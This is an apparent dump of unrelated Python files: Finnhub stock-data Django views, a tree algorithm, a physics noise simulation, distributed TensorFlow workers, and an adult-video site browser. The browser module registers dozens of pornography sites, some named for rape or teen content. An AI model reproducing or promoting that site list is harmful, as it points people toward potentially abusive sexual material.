        order['create_time'] = datetime.datetime.fromtimestamp(order['create_time']).strftime("%Y-%m-%d %H:%M:%S")
    # construct html
    env = Environment(
        loader=FileSystemLoader(template_dir),
    )
    template = env.get_template('template.html')
    html = template.render(orders=orders, process_info=process_info)
    email_obj = EmailObj(email_srv, email_user, email_pwd, email_port)
    email_obj.send_mail(subject, html, email_user, to_addr=email_addr)
|
from django.shortcuts import render, redirect, reverse
import pandas as pd
import requests
from .models import Exchange, Company
import time
from project import settings
from django.db import connection
from django.core.management import call_command
API_KEY = settings.FINNHUB_API_KEY
END_POINT = 'https://finnhub.io/api/v1'
def finhub(request):
    """Render the finhub landing page."""
    template_name = 'finhub/finhub.html'
    return render(request, template_name)
def exchange(request):
    """List all exchanges, seeding the table from the excel file on first use."""
    # An empty table means the one-off initial load has not happened yet.
    if Exchange.objects.count() == 0:
        records = pd.read_excel('exchanges.xlsx').to_dict('records')
        new_rows = (Exchange(**row) for row in records)
        Exchange.objects.bulk_create(new_rows)
    context = {'context': Exchange.objects.all()}
    return render(request, 'finhub/exchange.html', context)
def load_companies(request):
    """
    Delete all companies in DB and load them from the API; rebuild the
    elasticsearch index, then redirect to the exchange list.
    """
    # Company.objects.all().delete() is too slow; a raw TRUNCATE is fast.
    print('Starting sql for delete')
    cursor = connection.cursor()
    sql = "TRUNCATE TABLE finhub_company;"
    cursor.execute(sql)
    print('all companies are deleted')
    print('starting update via API calls')
    # count() lets the DB count rows instead of fetching every record.
    size = Exchange.objects.count()
    API = '/stock/symbol?exchange='
    for counter, exchange_record in enumerate(Exchange.objects.all(), start=1):
        url = END_POINT + API + exchange_record.code + '&token=' + API_KEY
        r = requests.get(url)
        df = pd.DataFrame(r.json())
        df_records = df.to_dict('records')
        model_instances = [Company(
            description=record['description'],
            displaySymbol=record['displaySymbol'],
            symbol=record['symbol'],
            exchange=exchange_record,
        ) for record in df_records]
        Company.objects.bulk_create(model_instances)
        print('Updated {}. Record {} of {}'.format(exchange_record, counter, size))
        # Throttle requests to stay under the API rate limit.
        time.sleep(1)
    print('startig elasticsearch index create')
    call_command('search_index', '--rebuild', '-f')
    return redirect('exchange')
def exchange_code(request, code):
    """
    Executed when visiting finhub/exchange/<str:code>/
    If there are no records in the DB for this stock exchange, load them from
    the API; otherwise serve them from the DB. Renders a template that allows
    a certain company to be selected -> redirects to company_details/<int:id>/
    """
    exchange_record = Exchange.objects.get(code=code)
    # BUGFIX: the original issued the external HTTP request unconditionally,
    # even when the DB already had the data; only hit the API when needed.
    if not Company.objects.filter(exchange=exchange_record).exists():
        API = '/stock/symbol?exchange='
        url = END_POINT + API + exchange_record.code + '&token=' + API_KEY
        r = requests.get(url)
        df = pd.DataFrame(r.json())
        df_records = df.to_dict('records')
        model_instances = [Company(
            description=record['description'],
            displaySymbol=record['displaySymbol'],
            symbol=record['symbol'],
            exchange=exchange_record,
        ) for record in df_records]
        Company.objects.bulk_create(model_instances)
    stocks = Company.objects.filter(exchange=exchange_record)
    context = {'exchange': exchange_record, 'stocks': stocks}
    return render(request, 'finhub/exchange_code.html', context)
def exchange_update(request, code):
    """
    Executed when visiting url finhub/exchange/<str:code>/update/
    Deletes all company records stored for the given stock exchange and
    redirects back to finhub/exchange/<str:code>/, which reloads them
    from the API.
    """
    exchange_record = Exchange.objects.get(code=code)
    Company.objects.filter(exchange=exchange_record).delete()
    return redirect('exchange_code', code=code)
# -*- coding:utf-8 -*-
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def HasSubtree(self, pRoot1, pRoot2):
        """Return True if pRoot2 is a substructure of tree pRoot1.

        By convention an empty tree is not a substructure of any tree.

        BUGFIX: the original serialized both trees into strings of
        concatenated preorder values and tested substring containment.
        That produces false positives: multi-digit values can merge across
        adjacent nodes, and a preorder substring does not imply a matching
        tree structure.  This version does the proper recursive structural
        comparison (same algorithm as the C++ reference below).
        """
        def matches(a, b):
            # Does the tree rooted at `a` contain `b` anchored at its root?
            if b is None:
                return True
            if a is None or a.val != b.val:
                return False
            return matches(a.left, b.left) and matches(a.right, b.right)

        if pRoot1 is None or pRoot2 is None:
            return False
        return (matches(pRoot1, pRoot2)
                or self.HasSubtree(pRoot1.left, pRoot2)
                or self.HasSubtree(pRoot1.right, pRoot2))
'''
参考https://github.com/imhuay/Algorithm_Interview_Notes-Chinese/blob/master/C-%E7%AE%97%E6%B3%95/%E4%B8%93%E9%A2%98-A-%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84.md#%E5%88%A4%E6%96%AD%E6%A0%91-b-%E6%98%AF%E5%90%A6%E4%B8%BA%E6%A0%91-a-%E7%9A%84%E5%AD%90%E7%BB%93%E6%9E%84
用递归来写
class Solution {
public:
bool HasSubtree(TreeNode* p1, TreeNode* p2) {
if (p1 == nullptr || p2 == nullptr) // 约定空树不是任意一个树的子结构
return false;
return isSubTree(p1, p2) // 判断子结构是否相同
|| HasSubtree(p1->left, p2) // 递归寻找树 A 中与树 B 根节点相同的子节点
|| HasSubtree(p1->right, p2);
}
bool isSubTree(TreeNode* p1, TreeNode* p2) {
if (p2 == nullptr) return true; // 注意这两个判断的顺序
if (p1 == nullptr) return false;
if (p1->val == p2->val)
return isSubTree(p1->left, p2->left) // 递归判断左右子树
&& isSubTree(p1->right, p2->right);
else
return false;
}
};
''' |
# -*- coding: utf-8 -*-
__author__ = 'Vit'
from common.setting import Setting
from data_format.url import URL
from interface.loader_interface import LoaderInterface
from interface.model_interface import ModelFromControllerInterface, ModelFromSiteInterface
from interface.site_interface import SiteInterface
from interface.view_manager_interface import ViewManagerFromModelInterface
from model.favorites.favorites import Favorites
from model.history_model.hystory import HistoryModel
from model.loader.multiprocess_loader import MultiprocessLoader
from model.site.other.space import Space
from model.site.picture.tgp_sites.babesandbitches import BabesandbitchesSite
from model.site.picture.tgp_sites.bravoerotica import BravoeroticaSite
from model.site.picture.tgp_sites.teenport import TeenportSite
from model.site.picture.tgp_sites.tomorrowporn import TomorrowpornSite
from model.site.picture.tgp_sites.vibraporn import VibrapornSite
from model.site.video.plus_file._nonwork.pornfun import PornfunSite
from model.site.video.plus_file._nonwork.sexix import SexixSite
from model.site.video.plus_file._nonwork.yourporn import YourpornSite
from model.site.video.plus_file.pornmz import PornmzSite
from model.site.video.plus_file.pornvibe import PornvibeSite
from model.site.video.plus_file.pornwild import PornwildSite
from model.site.video.plus_file.redtube import RedtubeSite
from model.site.video.plus_file.yespornpleasexxx import YespornpleasexxxSite
from model.site.video.script._nonwork.beemtube import BeemtubeSite
from model.site.video.script._nonwork.deviantclip import DeviantclipSite
from model.site.video.script._nonwork.motherless import MotherlessSite
from model.site.video.script._nonwork.porn0sex import Porn0sexSite
from model.site.video.script._nonwork.porncom import PornComSite
from model.site.video.script._nonwork.pornhd import PornhdSite
from model.site.video.script._nonwork.pornoxo import PornoxoSite
from model.site.video.script._nonwork.pornsland import PornslandSite
from model.site.video.script._nonwork.porntrex import PorntrexSite
from model.site.video.script._nonwork.rusvideos import RusvideosSite
from model.site.video.script._nonwork.spankwire import SpankwireSite
from model.site.video.script._nonwork.thumbzilla import ThumbzillaSite
from model.site.video.script._nonwork.tube8 import Tube8Site
from model.site.video.script._nonwork.v24videos import V24videoSite
from model.site.video.script._nonwork.youngpornvideos import YoungPornVideosSite
from model.site.video.script.boundhub import BoundhubSite
from model.site.video.script.jizzbunker import JizzbunkerSite
from model.site.video.script.katestube import KatestubeSite
from model.site.video.script.pervclips import PervclipsSite
from model.site.video.script.petardashd import PetardashdSite
from model.site.video.script.pornhub import PornhubSite
from model.site.video.script.pornicom import PornicomSite
from model.site.video.script.pornobomba import PornobombaSite
from model.site.video.script.pornwatchers import PornwatchersSite
from model.site.video.script.pornwhite import PornwhiteSite
from model.site.video.script.realgf import RealGfSite
from model.site.video.script.shockingmovies import ShockingmoviesSite
from model.site.video.script.shooshtime import ShooshtimeSite
from model.site.video.script.sleazyneasy import SleazyneasySite
from model.site.video.script.vikiporn import VikipornSite
from model.site.video.script.xhamster import XhamsterSite
from model.site.video.script.xnxx import XnxxSite
from model.site.video.script.xvideo import XvideoSite
from model.site.video.script.tprn import TprnSite
from model.site.video.script.frprn import FrprnSite
from model.site.video.script.xhand import XhandSite
from model.site.video.script.analdin import AnaldinSite
from model.site.video.script.crockotube import CrockotubeSite
from model.site.video.script.tryboobs import TryboobsSite
from model.site.video.script.xozilla import XozillaSite
from model.site.video.script.tubous import TubousSite
from model.site.video.script.xtits import XtitsSite
from model.site.video.simple.bravotube import BravotubeSite
from model.site.video.simple._nonwork.plusone8 import PlusoneSite
from model.site.video.simple._nonwork.collectionofbestporn import CollectionofbestpornSite
from model.site.video.simple._nonwork.hd_easyporn import HdEasypornSite
from model.site.video.simple._nonwork.heavy_r import HeavyRSite
from model.site.video.simple._nonwork.hotscope import HotscopeSite
from model.site.video.simple._nonwork.pornbozz import PornbozzSite
from model.site.video.simple._nonwork.porngo import PorngoSite
from model.site.video.simple._nonwork.pornone import PornoneSite
from model.site.video.simple._nonwork.tnaflix import TnaflixSite
from model.site.video.simple._nonwork.darknessporn import DarknesspornSite
from model.site.video.simple.dlouha import DlouhaSite
from model.site.video.simple.fapmeifyoucan import FapmeifyoucanSite
from model.site.video.simple.freeuseporn import FreeusepornSite
from model.site.video.simple.gigporno import GigpornoSite
from model.site.video.simple.homeporno import HomepornoSite
from model.site.video.simple.its import ItsSite
from model.site.video.simple.pohub import PohubSite
from model.site.video.simple.pornoakt import PornoaktSite
from model.site.video.simple.pornozot import PornozotSite
from model.site.video.simple.pornxxxvideos import PornxxxvideosSite
from model.site.video.simple.rapelust import RapelustSite
from model.site.video.simple.ruleporn import RulepornSite
from model.site.video.simple.sextube_nl import SextubeNlSite
from model.site.video.simple.sickjunk import SickjunkSite
from model.site.video.simple.spreee import SpreeeSite
from model.site.video.simple.test import TestSite
from model.site.video.simple.xdporner import XdpornerSite
from model.site.video.simple.iporntoo import IporntooSite
from model.site.video.simple.bdsmone import BdsmoneSite
from model.site.video.simple.crocotube import CrocotubeSite
from model.site.video.simple.fapguru import FapguruSite
from model.site.video.simple.freeporn import FreepornSite
from model.site.video.simple.hdporn import HdpornSite
from model.site.video.simple.pornpapa import PornpapaSite
from model.site.video.simple.sex3 import Sex3Site
from model.site.video.simple.sextubefun import SextubefunSite
from model.site.video.simple.stileproject import StileprojectSite
from model.site.video.simple.spicyflix import SpicyflixSite
from model.site.video.simple.xcum import XcumSite
from model.site.video.xhr._nonwork.extremetube import ExtremetubeSite
from model.site.video.xhr._nonwork.pervertslut import PervertslutSite
class Model(ModelFromControllerInterface, ModelFromSiteInterface):
    """Central application model.

    Owns the registered site models, the download loader, thumbnail/full
    history and the favorites store, and forwards updates to the injected
    view manager.
    """
    def __init__(self, view_manager:ViewManagerFromModelInterface):
        self._view_manager=view_manager
        self._loader=MultiprocessLoader()
        # The order of this list is significant: it is iterated to create the
        # start buttons, so it defines the display order.  Space(...) entries
        # act as section separators.
        self._site_models=[
            TestSite,
            Space('Classic:'),
            XozillaSite,XtitsSite,
            XhamsterSite,Sex3Site,
            AnaldinSite,SextubefunSite,
            BravotubeSite,
            KatestubeSite,ShockingmoviesSite,HdpornSite,
            PornhubSite,TprnSite,CrocotubeSite,XcumSite,
            RedtubeSite,PornicomSite,SleazyneasySite,PervclipsSite,VikipornSite,IporntooSite,
            XhandSite,ShooshtimeSite,
            ItsSite,FapmeifyoucanSite,
            DlouhaSite,FrprnSite,
            PornwildSite,PornmzSite,PornwhiteSite,CrockotubeSite,
            YespornpleasexxxSite,SickjunkSite,
            SpreeeSite,XdpornerSite,
            PornvibeSite,
            XvideoSite,RulepornSite,
            GigpornoSite,JizzbunkerSite,
            HomepornoSite,PetardashdSite,
            SextubeNlSite,
            Space('Static:'),
            TubousSite,TryboobsSite,SpicyflixSite,StileprojectSite, FapguruSite,FreepornSite,PornpapaSite,PornwatchersSite,XnxxSite,PornxxxvideosSite,
            # Space('Amateur:'),
            Space('Deviant:'),
            BoundhubSite,BdsmoneSite,RapelustSite,FreeusepornSite,
            # Space('Short:'),
            Space('Photo:'),
            BravoeroticaSite,TomorrowpornSite,TeenportSite,VibrapornSite,
            BabesandbitchesSite,
            Space('Non working:'),
            DarknesspornSite,PornobombaSite,RealGfSite,
            RusvideosSite, HdEasypornSite,PohubSite,PornozotSite,PornoaktSite,
            PlusoneSite,
            CollectionofbestpornSite,
            PorngoSite,
            HotscopeSite,
            HeavyRSite,PornslandSite,V24videoSite,YourpornSite,TnaflixSite,SexixSite,
            PornhdSite,ThumbzillaSite,SpankwireSite,
            PornComSite,PornoxoSite,YoungPornVideosSite,
            DeviantclipSite,ExtremetubeSite,PervertslutSite,MotherlessSite,PornfunSite,PornbozzSite,
            Tube8Site,BeemtubeSite,PornoneSite,Porn0sexSite,
            Space('Blocked'),
            PorntrexSite,
            ]
        self._thumb_history=HistoryModel('thumb', self._view_manager.on_thumb_history_changed)
        self._full_history=HistoryModel('full', self._view_manager.on_full_history_changed)
        self._favorites=Favorites(Setting.global_data_path+'favorites.json')
        # Count the domains accepted across all registered sites.
        # NOTE(review): "dimains" looks like a typo for "domains" in the site
        # interface; it cannot be renamed here without touching every site class.
        n=0
        for site in self._site_models:
            n+=site.number_of_accepted_dimains()
        print('No of sites:',n)
    def create_sites(self):
        """Ask every registered site class to add its start button to the view."""
        for site_class in self._site_models:
            site_class.create_start_button(self.view_manager)
    def goto_url(self, url: URL, **options):
        """Dispatch *url* to the first site model that accepts it."""
        site=self.can_accept_url(url)
        if site:
            # Instantiate the accepting site class with this model and navigate.
            site(self).goto_url(url, **options)
        else:
            print('Rejected', url)
    def add_to_favorites(self, url: URL, label:str=None):
        """Store *url* as a favorite; derive the label from the accepting site when omitted."""
        if label:
            self._favorites.add(label,url)
        else:
            site_class=self.can_accept_url(url)
            if site_class:
                label=site_class.get_thumb_label(url)
                self._favorites.add(label, url)
    def remove_favorite(self, url):
        """Remove *url* from favorites and refresh the thumbnail view."""
        print('Removing',url)
        self._favorites.remove(url)
        self._view_manager.refresh_thumb_view()
    def get_favorite_items(self, site: SiteInterface) -> list:
        """Return the stored favorite items belonging to *site*."""
        return self._favorites.get_favorite_items(site)
    def can_accept_url(self, url: URL):
        """Return the first site class accepting *url*, or None."""
        for site_class in self._site_models:
            if site_class.can_accept_url(url):
                return site_class
        return None
    def on_cycle_handler(self):
        """Periodic tick: let the loader advance its downloads."""
        self._loader.on_update()
    def on_exit(self):
        """Shut down the loader and persist favorites on application exit."""
        self._loader.on_exit()
        self._favorites.on_exit()
    @property
    def view_manager(self) -> ViewManagerFromModelInterface:
        return self._view_manager
    @property
    def loader(self) -> LoaderInterface:
        return self._loader
    @property
    def full_history(self) -> HistoryModel:
        return self._full_history
    @property
    def thumb_history(self) -> HistoryModel:
        return self._thumb_history
if __name__ == "__main__":
    # This module is a library; it is not meant to be executed directly.
    pass
import numpy as np
import matplotlib.pyplot as plt
import trimesh
from mayavi import mlab
from bfieldtools.thermal_noise import (
compute_current_modes,
noise_covar,
noise_var,
visualize_current_modes,
)
from bfieldtools.mesh_magnetics import magnetic_field_coupling
import pkg_resources
# Matplotlib font setup.
# NOTE(review): "normal" is not an actual font family name; matplotlib will
# fall back to its default (and may warn) — confirm intent.
font = {"family": "normal", "weight": "normal", "size": 16}
plt.rc("font", **font)
# Fix the simulation parameters
d = 1e-3  # conductor thickness passed to compute_current_modes
sigma = 3.8e7  # conductivity; resistivity = 1 / sigma below
T = 293  # temperature
kB = 1.38064852e-23  # Boltzmann constant
mu0 = 4 * np.pi * 1e-7  # vacuum permeability
# NOTE(review): freqs, Nchunks and quad_degree are defined but unused in the
# visible part of this script.
freqs = np.array((0,))
Nchunks = 8
quad_degree = 2
# Load the closed-cylinder example mesh shipped with bfieldtools.
mesh = trimesh.load(
    pkg_resources.resource_filename("bfieldtools", "example_meshes/closed_cylinder.stl")
)
# Refine the mesh once by subdivision.
mesh.vertices, mesh.faces = trimesh.remesh.subdivide(mesh.vertices, mesh.faces)
# Thermal-noise current modes of the conducting surface.
vl = compute_current_modes(
    obj=mesh, T=T, resistivity=1 / sigma, thickness=d, mode="AC", return_eigenvals=False
)
vl[:, 0] = np.zeros(vl[:, 0].shape) # fix DC-component
# Visualize the first current modes on the mesh.
scene = mlab.figure(None, bgcolor=(1, 1, 1), fgcolor=(0.5, 0.5, 0.5), size=(800, 800))
visualize_current_modes(mesh, vl[:, :, 0], 8, 1)
# Render the mesh itself as a wireframe in a second mayavi figure.
scene = mlab.figure(None, bgcolor=(1, 1, 1), fgcolor=(0.5, 0.5, 0.5), size=(800, 800))
s = mlab.triangular_mesh(*mesh.vertices.T, mesh.faces)
scene.scene.z_minus_view()
surface = scene.children[0].children[0].children[0].children[0]
surface.actor.property.representation = "wireframe"
surface.actor.mapper.scalar_visibility = False
scene.scene.isometric_view()
scene.scene.render()
# Field evaluation points along the x axis (y = z = 0).
Np = 30
x = np.linspace(-0.95, 0.95, Np)
fp = np.array((x, np.zeros(x.shape), np.zeros(x.shape))).T
# Magnetic-field coupling matrix from the mesh to the field points,
# then the field-noise variance from the current modes.
B_coupling = magnetic_field_coupling(mesh, fp, analytic=True)
B = noise_var(B_coupling, vl)
# Analytic comparison for a cylinder of radius a and length L.
a = 0.5
L = 2
rat = L / (2 * a)
# Geometry factor of the analytic noise model for this aspect ratio.
Gfact = (
    1
    / (8 * np.pi)
    * (
        (3 * rat**5 + 5 * rat**3 + 2) / (rat**2 * (1 + rat**2) ** 2)
        + 3 * np.arctan(rat)
    )
)
Ban = np.sqrt(Gfact) * mu0 * np.sqrt(kB * T * sigma * d) / a
# Compare the numerical z-component noise with the analytic level (in fT/rHz).
plt.figure(figsize=(5, 5))
plt.plot(x, Ban * np.ones(x.shape) * 1e15, label="Analytic", linewidth=2)
plt.plot(
    x,
    np.sqrt(B[:, 0]) * 1e15,
    "x",
    label="Numerical",
    markersize=10,
    markeredgewidth=2,
)
plt.grid()
plt.gca().spines["right"].set_visible(False)
plt.gca().spines["top"].set_visible(False)
plt.legend(frameon=False)
plt.xlabel("z (m)")
plt.ylabel(r"$B_z$ noise at DC (fT/rHz)")
plt.tight_layout()
# All three field components on a log scale.
plt.figure()
plt.semilogy(x, np.sqrt(B[:, 0]), label="x")
plt.semilogy(x, np.sqrt(B[:, 1]), label="y")
plt.semilogy(x, np.sqrt(B[:, 2]), "--", label="z")
plt.legend()
plt.xlabel("z (m)")
plt.ylabel("DC noise (T/rHz)")
|
from multiprocessing import Process, Queue, Event
import tensorflow as tf
from tensorflow import keras
from tensorflow.contrib import training
import numpy as np
from typing import Callable
class DistributedNetworkConfig:
    """Hyper-parameter bundle for the distributed network processes.

    Any keyword arguments not listed in the signature are collected
    verbatim in ``other_args`` for downstream consumers.
    """
    def __init__(self, learning_rate=0.01, policy_weight=1.0,
                 training_batch_size=64, tensorboard_log=False,
                 log_dir="./logs", checkpoint_steps=None,
                 checkpoint_dir=None, **kwargs):
        # Optimization settings.
        self.learning_rate = learning_rate
        self.policy_weight = policy_weight
        self.training_batch_size = training_batch_size
        # Logging and checkpointing settings.
        self.tensorboard_log = tensorboard_log
        self.log_dir = log_dir
        self.checkpoint_steps = checkpoint_steps
        self.checkpoint_dir = checkpoint_dir
        # Everything else is passed through untouched.
        self.other_args = kwargs
class DistributedNetworkProcess(Process):
    """Process hosting one distributed-TensorFlow task.

    A parameter-server task only joins the tf.train.Server; a worker task
    builds the prediction graph and serves batched inference requests that
    arrive through shared-memory buffers and a queue (see ``run``).
    """
    def __init__(self, make_network: Callable[[], keras.Model],
                 session_config: tf.ConfigProto,
                 task_index: int,
                 parameter_server: bool,
                 cluster_spec: tf.train.ClusterSpec,
                 input_queue: Queue,
                 ready_event: Event,
                 output_ready: [Event],
                 input_buffer: np.ndarray,
                 index_buffer: np.ndarray,
                 policy_buffer: np.ndarray,
                 value_buffer: np.ndarray,
                 **kwargs):
        """ Class for managing a distributed tensorflow model.
        This class creates the TF graphs and the distributed server.
        Parameters
        ----------
        make_network : () -> keras.Model
            Function defining how to construct your network.
        session_config : tf.ConfigProto
            Tensorflow session config object.
        task_index : int
            Index of this worker on the cluster spec.
        parameter_server : bool
            Whether or not this instance is a parameter server.
        cluster_spec : tf.train.ClusterSpec
            Cluster Spec containing the paths for all workers in the cluster.
        input_queue : Queue
            This networks input queue.
        ready_event : Event
            This networks ready event.
        output_ready : [Event]
            Output events for all connected workers.
        input_buffer : np.ndarray
            Input buffer for storing worker inputs
        index_buffer : np.ndarray
            This workers index buffer, this is where it gets prediction requests from.
        policy_buffer : np.ndarray
            Output buffer.
        value_buffer : np.ndarray
            Output buffer.
        kwargs
            Optional arguments that are passed to DistributedNetworkConfig.
        """
        super(DistributedNetworkProcess, self).__init__()
        self.make_network = make_network
        self.session_config = session_config
        self.network_config = DistributedNetworkConfig(**kwargs)
        self.task_index = task_index
        self.cluster_spec = cluster_spec
        self.parameter_server = parameter_server
        self.input_queue = input_queue
        self.ready_event = ready_event
        self.output_ready = output_ready
        self.input_buffer = input_buffer
        self.index_buffer = index_buffer
        self.policy_buffer = policy_buffer
        self.value_buffer = value_buffer
    def _initialize_network(self, training_network: bool = False) -> None:
        """ Create Tensorflow graph. """
        # Variable initialization is left to the MonitoredTrainingSession,
        # so Keras must not initialize variables on its own.
        keras.backend.manual_variable_initialization(True)
        device_name = "/job:worker/task:{}".format(self.task_index)
        num_ps = self.cluster_spec.num_tasks("ps")
        # Spread variables across parameter servers balanced by byte size.
        strategy = training.GreedyLoadBalancingStrategy(num_tasks=num_ps, load_fn=training.byte_size_load_fn)
        device = tf.train.replica_device_setter(worker_device=device_name, cluster=self.cluster_spec,
                                                ps_strategy=strategy)
        with tf.device(device):
            self.global_step = tf.train.get_or_create_global_step()
            self.training_phase = keras.backend.learning_phase()
            with tf.name_scope("Targets"):
                # Training targets: a policy distribution over all moves and
                # a scalar value per example.
                num_moves = self.policy_buffer.shape[-1]
                self.policy_target = tf.placeholder(tf.float32, shape=(None, num_moves), name="PolicyTargets")
                self.value_target = tf.placeholder(tf.float32, shape=(None, 1), name="ValueTargets")
            with tf.name_scope("Network"):
                # The model is expected to output (policy logits, value).
                self.model = self.make_network()
                self.x = self.model.input
                self.policy, self.value = self.model.output
            if training_network:
                with tf.name_scope("Loss"):
                    with tf.name_scope("ValueLoss"):
                        value_loss = tf.losses.mean_squared_error(self.value_target, self.value)
                        self.value_loss = tf.reduce_mean(value_loss)
                    with tf.name_scope("PolicyLoss"):
                        policy_loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.policy_target,
                                                                                 logits=self.policy)
                        self.policy_loss = tf.reduce_mean(policy_loss)
                    with tf.name_scope("TotalLoss"):
                        # Normalize the configured policy weight so that the
                        # policy and value weights sum to 1.
                        policy_weight = self.network_config.policy_weight
                        policy_weight = policy_weight / (policy_weight + 1)
                        value_weight = 1 - policy_weight
                        self.total_loss = (policy_weight * self.policy_loss) + (value_weight * self.value_loss)
                with tf.name_scope("Optimizer"):
                    self.optimizer = tf.train.AdamOptimizer(learning_rate=self.network_config.learning_rate)
                    self.train_op = self.optimizer.minimize(self.total_loss, global_step=self.global_step)
                    # Run the model's update ops together with the train step.
                    self.train_op = tf.group(self.train_op, *self.model.updates)
                self.summary_op = tf.no_op()
                if self.network_config.tensorboard_log:
                    with tf.name_scope("Loss"):
                        tf.summary.scalar('policy_loss', self.policy_loss)
                        tf.summary.scalar('value_loss', self.value_loss)
                        tf.summary.scalar('total_loss', self.total_loss)
                    with tf.name_scope("Debug"):
                        tf.summary.histogram("value_targets", self.value_target)
                        # One histogram per layer weight for debugging.
                        for layer in self.model.layers:
                            with tf.name_scope(layer.name):
                                for weight in layer.weights:
                                    with tf.name_scope(weight.name.split("/")[-1].split(":")[0]):
                                        tf.summary.histogram('histogram', weight)
                    self.summary_op = tf.summary.merge_all()
    @staticmethod
    def _limit_gpu(task_index: int) -> None:
        """ Limit the current process to only using one gpu. The gpu is selected in round robin by task index.
        Parameters
        ----------
        task_index : int
            The index of this worker.
        """
        import os
        try:
            visible_devices = os.environ['CUDA_VISIBLE_DEVICES']
        except KeyError:
            # No device restriction configured; nothing to limit.
            return
        visible_devices = visible_devices.split(',')
        num_devices = len(visible_devices)
        if num_devices == 1:
            return
        os.environ['CUDA_VISIBLE_DEVICES'] = visible_devices[task_index % num_devices]
    def run(self):
        self._limit_gpu(self.task_index)
        # Create and start a server for the local task.
        job_name = "ps" if self.parameter_server else "worker"
        server = tf.train.Server(self.cluster_spec, job_name=job_name, task_index=self.task_index,
                                 config=self.session_config)
        # Parameter Server chills here
        if self.parameter_server:
            server.join()
            return
        # The workers continue
        self._initialize_network()
        # Add hooks if necessary
        hooks = None
        chief_only_hooks = None
        # Create a monitored session for communication between network workers.
        print(server.target)
        with tf.train.MonitoredTrainingSession(master=server.target, is_chief=(self.task_index == 0),
                                               hooks=hooks, chief_only_hooks=chief_only_hooks,
                                               config=self.session_config,
                                               checkpoint_dir=self.network_config.checkpoint_dir,
                                               save_checkpoint_steps=self.network_config.checkpoint_steps,
                                               save_summaries_steps=None, save_summaries_secs=None) as sess:
            keras.backend.set_session(sess)
            # Store Variables locally for faster access
            num_states = self.input_buffer.shape[1]
            state_shape = self.input_buffer.shape[2:]
            input_queue = self.input_queue
            ready_event = self.ready_event
            output_ready = self.output_ready
            input_buffer = self.input_buffer
            index_buffer = self.index_buffer
            policy_buffer = self.policy_buffer
            value_buffer = self.value_buffer
            num_moves = policy_buffer.shape[-1]
            policy = self.policy
            value = self.value
            x = self.x
            training_phase = self.training_phase
            # Ready to predict
            ready_event.set()
            while True:
                # Wait for a new request from manager.
                size = input_queue.get()
                # Copy the indices before re-setting ready_event below, since
                # the manager may then overwrite the index buffer.
                idx = index_buffer[:size].copy()
                # Create the appropriate input batch
                batch = input_buffer[idx]
                batch = batch.reshape(size * num_states, *state_shape)
                # Predict from the network.
                policy_batch, value_batch = sess.run([policy, value], {x: batch, training_phase: 0})
                # At this stage, we're done with the input and index buffer. So the manager can place more inputs.
                ready_event.set()
                # Reshape and output results
                policy_batch = policy_batch.reshape(size, num_states, num_moves)
                value_batch = value_batch.reshape(size, num_states, 1)
                policy_buffer[idx, :, :] = policy_batch[:, :, :]
                value_buffer[idx, :, :] = value_batch[:, :, :]
                # Signal to workers that their results are ready.
                for worker in idx:
                    output_ready[worker].set()
class DistributedTrainingProcess(DistributedNetworkProcess):
    """Distributed worker process dedicated to *training* the network.

    Unlike the base prediction worker, this process consumes
    ``(command, size)`` tuples from ``input_queue``: command ``1`` saves the
    model weights, anything else runs mini-batch optimisation over the first
    ``size`` rows of the shared training/target buffers.
    """
    def __init__(self, make_network: Callable[[], keras.Model],
                 session_config: tf.ConfigProto,
                 task_index: int,
                 cluster_spec: tf.train.ClusterSpec,
                 input_queue: Queue,
                 ready_event: Event,
                 training_buffer: np.ndarray,
                 policy_target_buffer: np.ndarray,
                 value_target_buffer: np.ndarray,
                 **kwargs):
        """Configure the training worker.

        :param make_network: zero-argument factory that builds the Keras model.
        :param session_config: TF session configuration for this worker.
        :param task_index: index of this task in the "worker" job.
        :param cluster_spec: cluster layout shared by all processes.
        :param input_queue: receives (command, size) training requests.
        :param ready_event: set whenever this worker can accept a new request.
        :param training_buffer: shared input states to train on.
        :param policy_target_buffer: shared policy-head training targets.
        :param value_target_buffer: shared value-head training targets.
        """
        # Reuse the base initialiser; a training worker has no per-worker
        # output events or index buffer and is never a parameter server.
        super(DistributedTrainingProcess, self).__init__(make_network=make_network,
                                                         session_config=session_config,
                                                         task_index=task_index,
                                                         parameter_server=False,
                                                         cluster_spec=cluster_spec,
                                                         input_queue=input_queue,
                                                         ready_event=ready_event,
                                                         output_ready=None,
                                                         input_buffer=training_buffer,
                                                         index_buffer=None,
                                                         policy_buffer=policy_target_buffer,
                                                         value_buffer=value_target_buffer,
                                                         **kwargs)
        self.training_buffer = training_buffer
        self.policy_target_buffer = policy_target_buffer
        self.value_target_buffer = value_target_buffer
    # noinspection SpellCheckingInspection
    def run(self):
        """Serve training requests forever (this loop never returns).

        Joins the cluster as a "worker" task, builds the training graph, then
        loops: pop (command, size) from the queue, save weights or train, and
        signal ``ready_event`` when buffers may be refilled.
        """
        self._limit_gpu(self.task_index)
        server = tf.train.Server(self.cluster_spec, job_name="worker", task_index=self.task_index,
                                 config=self.session_config)
        self._initialize_network(training_network=True)
        # Add hooks if necessary
        hooks = None
        chief_only_hooks = None
        print(server.target)
        # The monitored session handles checkpointing; per-step summary
        # saving is disabled here and done manually via `writer` below.
        with tf.train.MonitoredTrainingSession(master=server.target, is_chief=(self.task_index == 0),
                                               hooks=hooks, chief_only_hooks=chief_only_hooks,
                                               config=self.session_config,
                                               checkpoint_dir=self.network_config.checkpoint_dir,
                                               save_checkpoint_secs=None,
                                               save_checkpoint_steps=self.network_config.checkpoint_steps,
                                               save_summaries_steps=None, save_summaries_secs=None) as sess:
            keras.backend.set_session(sess)
            writer = None
            if self.network_config.tensorboard_log:
                writer = tf.summary.FileWriter(self.network_config.log_dir, graph=sess.graph)
            # Bind shared state to locals for faster access in the loop.
            input_queue = self.input_queue
            ready_event = self.ready_event
            training_buffer = self.training_buffer
            policy_target_buffer = self.policy_target_buffer
            value_target_buffer = self.value_target_buffer
            batch_size = self.network_config.training_batch_size
            # Signal that the worker is initialised and ready for requests.
            ready_event.set()
            while True:
                command, size = input_queue.get()
                if command == 1:
                    # NOTE(review): for the save command, `size` is passed as
                    # the first save_weights argument — presumably a file
                    # path rather than a row count; confirm against callers.
                    self.model.save_weights(size, True)
                else:
                    # Train on the first `size` rows of the shared buffers,
                    # in consecutive mini-batches of `batch_size`.
                    train_data = training_buffer[:size]
                    policy_targets = policy_target_buffer[:size]
